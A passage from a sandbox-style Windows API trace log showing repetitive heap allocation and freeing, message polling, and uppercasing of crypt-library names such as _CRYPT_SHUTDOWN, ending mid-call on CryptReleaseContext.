hHeap=0x970000) returned 1 [0185.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0185.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0185.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0185.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0185.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0185.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0185.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0185.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0185.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0185.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0185.609] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0185.609] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0185.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0185.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0185.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0185.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0185.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0185.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0185.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0185.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0185.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0185.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0185.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0185.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0185.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0185.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0185.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0185.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0185.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0185.610] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0185.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0185.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0185.610] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0185.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0185.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0185.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0185.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0185.610] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0185.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc00 [0185.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0185.610] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0185.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc00 | out: hHeap=0x970000) returned 1 [0185.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0185.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0185.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0185.611] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0185.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0185.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0185.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0185.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0185.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0185.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0185.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0185.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0185.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0185.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0185.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0185.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50788 [0185.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0185.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50980 [0185.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0185.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0185.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50848 [0185.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50878 [0185.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50890 [0185.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0185.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0185.611] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0185.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0185.611] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0185.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0185.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0185.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0185.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0185.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0185.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0185.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0185.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0185.612] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0185.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0185.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0185.612] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0185.612] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0185.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fff0 | out: hHeap=0x970000) returned 1 [0185.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0185.612] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0185.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0185.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0185.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0185.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0185.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0185.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0185.612] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0185.613] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0185.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0185.613] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0185.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0185.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0185.613] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0185.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0185.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0185.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0185.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0185.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0185.613] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0185.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0185.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0185.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0185.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0185.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0185.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0185.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0185.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0185.613] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0185.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0185.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0185.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0185.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0185.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0185.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0185.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0185.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0185.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0185.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0185.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0185.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0185.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0185.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0185.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0185.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0185.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0185.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0185.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0185.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0185.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0185.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0185.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0185.614] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0185.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0185.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0185.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0185.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0185.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0185.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0185.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0185.615] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0185.615] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0185.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0185.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0185.615] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0185.615] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0185.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdf8 | out: hHeap=0x970000) returned 1 [0185.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0185.615] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0185.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0185.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0185.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0185.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0185.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0185.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0185.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0185.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0185.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0185.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0185.615] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0185.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0185.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0185.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0185.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0185.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0185.616] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0185.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0185.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0185.616] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0185.616] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0185.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0185.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0185.616] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0185.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0185.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0185.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0185.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0185.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0185.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0185.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0185.616] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0185.616] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0185.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0185.616] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0185.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0185.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0185.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0185.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0185.616] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0185.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0185.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0185.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0185.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0185.617] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0185.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0185.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0185.617] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0185.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0185.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0185.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0185.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0185.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0185.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0185.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0185.617] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0185.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0185.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0185.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0185.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0185.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0185.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0185.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0185.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0185.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0185.617] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0185.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0185.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", 